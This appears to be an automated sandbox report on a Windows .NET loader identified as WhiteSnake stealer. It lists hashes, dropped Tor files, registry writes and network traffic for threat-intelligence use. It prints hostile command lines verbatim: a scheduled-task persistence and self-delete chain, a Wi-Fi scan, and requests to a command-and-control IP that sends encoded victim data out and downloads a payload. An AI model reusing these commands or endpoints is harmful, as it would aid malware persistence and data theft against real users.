| File name: | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe |
| Full analysis: | https://app.any.run/tasks/ac625eb7-4264-4b5c-ab5d-45b83c86a053 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | September 26, 2024, 18:42:55 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5: | F39F62E3B4B6520C0ECCAE3D4E5879DB |
| SHA1: | 553CAF9ACA39F934570B164F367D6BC88D81F7E9 |
| SHA256: | E4C6B205BBBF9CA0DA3EC10F657FAFD265C56C11A445244AAA7C340B348A8892 |
| SSDEEP: | 6144:kBYYlfg+99bMZ9YaWOWERhhhhhhhhhhhOOOOOyz:k20fqZaoWshhhhhhhhhhhOOOOOO |
| .exe | | | Win64 Executable (generic) (49.4) |
|---|---|---|
| .scr | | | Windows screen saver (23.4) |
| .dll | | | Win32 Dynamic Link Library (generic) (11.7) |
| .exe | | | Win32 Executable (generic) (8) |
| .exe | | | Generic Win/DOS Executable (3.5) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2093:04:03 11:16:41+00:00 |
| ImageFileCharacteristics: | Executable, Large address aware |
| PEType: | PE32 |
| LinkerVersion: | 48 |
| CodeSize: | 136704 |
| InitializedDataSize: | 54784 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x234de |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 6 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 1.1.2.2 |
| ProductVersionNumber: | 1.1.2.2 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| Comments: | ba9a475e1fbe248bfcb6a8f |
| CompanyName: | ra9000111de01ca960ddbce214b3a |
| FileDescription: | a808c5dcf7bf88de3c4bdb775 |
| FileVersion: | 45.41.83.9 |
| InternalName: | xe8cb404d62f26a2fa8bc2b.exe |
| LegalCopyright: | Ec12b8570006b4980e7c872281e44ac8e |
| LegalTrademarks: | J1453bac1cae471d32acb3840 |
| OriginalFileName: | ca83af09886c06586e71004b4cf7b30d553.exe |
| ProductName: | ja32adb02726d03976c7c3e62ac5e7b |
| ProductVersion: | 9.4.16.26 |
| AssemblyVersion: | 4.11.54.83 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 864 | netsh wlan show networks mode=bssid | C:\Windows\System32\netsh.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Network Command Shell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1236 | "C:\Users\admin\Desktop\e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe" | C:\Users\admin\Desktop\e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | explorer.exe | ||||||||||||
User: admin Company: ra9000111de01ca960ddbce214b3a Integrity Level: MEDIUM Description: a808c5dcf7bf88de3c4bdb775 Exit code: 0 Version: 45.41.83.9 Modules
| |||||||||||||||
| 1636 | chcp 65001 | C:\Windows\System32\chcp.com | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Change CodePage Utility Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1692 | findstr "SSID BSSID Signal" | C:\Windows\System32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1804 | "C:\Users\admin\AppData\Roaming\OfficeManager.exe" | C:\Users\admin\AppData\Roaming\OfficeManager.exe | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | ||||||||||||
User: admin Company: Innovatech Solutions Inc. Integrity Level: MEDIUM Description: Office Manager for various types of daily tasks needed by anyone Exit code: 3 Version: 1.0.0.234 Modules
| |||||||||||||||
| 1932 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2256 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2376 | "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" | C:\Windows\System32\cmd.exe | — | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2436 | "C:\Users\admin\AppData\Roaming\StarLabs\OfficeManager.exe" | C:\Users\admin\AppData\Roaming\StarLabs\OfficeManager.exe | OfficeManager.exe | ||||||||||||
User: admin Company: Innovatech Solutions Inc. Integrity Level: MEDIUM Description: Office Manager for various types of daily tasks needed by anyone Version: 1.0.0.234 Modules
| |||||||||||||||
| 2520 | "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892" /sc MINUTE /tr "C:\Users\admin\AppData\Local\Starlabs\e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\admin\Desktop\e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe" &&START "" "C:\Users\admin\AppData\Local\Starlabs\e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe" | C:\Windows\System32\cmd.exe | — | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (5184) e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\lwblm0rcyp\tor\geoip6 | — | |
MD5:— | SHA256:— | |||
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\Temp\tmp7381.tmp | compressed | |
MD5:F4E79137AB4B7C0AF7F410F87561BF23 | SHA256:044940B15C5DD4EB47C58BBD1F58F81B431CE82B6501F8744C9AE3EFB26C7AE7 | |||
| 1804 | OfficeManager.exe | C:\Users\admin\AppData\Roaming\StarLabs\OfficeManager.exe | executable | |
MD5:5D08EA74543EFB3C2DC0DF2522655DC5 | SHA256:175E4400E2E99B0D0AC35BD3FE68519FA91F9AE5CC7A71D0B8697302BD8FBE8E | |||
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\lwblm0rcyp\tor\geoip | text | |
MD5:7AD60C3E9CDB9992B1C2F5D79701B812 | SHA256:0AA9299BFF0A8AE1B1FEC6B6C96C551CC2FC31E213BD11EA9F414D571CC8C9D3 | |||
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\lwblm0rcyp\tor\libwinpthread-1.dll | executable | |
MD5:19D7CC4377F3C09D97C6DA06FBABC7DC | SHA256:228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D | |||
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\lwblm0rcyp\tor\libssl-1_1.dll | executable | |
MD5:945D225539BECC01FBCA32E9FF6464F0 | SHA256:C697434857A039BF27238C105BE0487A0C6C611DD36CB1587C3C6B3BF582718A | |||
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\lwblm0rcyp\tor\libssp-0.dll | executable | |
MD5:B77328DA7CEAD5F4623748A70727860D | SHA256:46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7 | |||
| 5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Roaming\OfficeManager.exe | executable | |
MD5:5D08EA74543EFB3C2DC0DF2522655DC5 | SHA256:175E4400E2E99B0D0AC35BD3FE68519FA91F9AE5CC7A71D0B8697302BD8FBE8E | |||
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\lwblm0rcyp\tor\tor-bg.vbs | text | |
MD5:C066AE688069850E35E30EBA9C0FB4CA | SHA256:816D5F7CD7C8B6AC18BD37E018A78FE95E6EE3A70EA232431C450FB4447CBF4A | |||
| 6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | C:\Users\admin\AppData\Local\lwblm0rcyp\tor\torrc | text | |
MD5:1EF93CDA02A0C4AD92978542D2BCCCA9 | SHA256:422CDB7373F4A7A568FF9EE7147A0B0E608066A573CA6A7531D2BD1B40844811 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4704 | RUXIMICS.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2120 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 302 | 140.82.121.3:443 | https://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip | unknown | — | — | — |
2092 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | POST | 200 | 185.80.128.17:8080 | http://185.80.128.17:8080/sendData?pk=REU1MkNBNTZBOTkwNzA4MkMxNzE0NDE2MkNDMjhGMjQ=&ta=U3lzRGlnSU5D&un=YWRtaW4=&pc=REVTS1RPUC1KR0xMSkxE&co=VWtyYWluZQ==&wa=MA==&be=MQ== | unknown | — | — | unknown |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line?fields=query,country | unknown | — | — | shared |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | GET | 200 | 185.80.128.17:80 | http://185.80.128.17/OfficeManager.exe | unknown | — | — | unknown |
— | — | GET | 302 | 140.82.121.3:443 | https://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip | unknown | — | — | — |
6460 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | GET | 200 | 185.80.128.17:8080 | http://185.80.128.17:8080/mnemonic-verify/078BFBFF000506E3/DE52CA56A9907082C17144162CC28F24 | unknown | — | — | unknown |
— | — | GET | 200 | 2.21.20.137:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2092 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4704 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2120 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2092 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4704 | RUXIMICS.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
2120 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
github.com |
| shared |
objects.githubusercontent.com |
| shared |
ip-api.com |
| shared |
crl.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
— | — | Potentially Bad Traffic | ET HUNTING Terse Request for Zip File (GET) |
2256 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
2256 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | A Network Trojan was detected | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | A Network Trojan was detected | STEALER [ANY.RUN] WhiteSnake HTTP Request |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | A Network Trojan was detected | ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | A Network Trojan was detected | STEALER [ANY.RUN] WhiteSnake HTTP POST Report Exfiltration |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
5184 | e4c6b205bbbf9ca0da3ec10f657fafd265c56c11a445244aaa7c340b348a8892.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |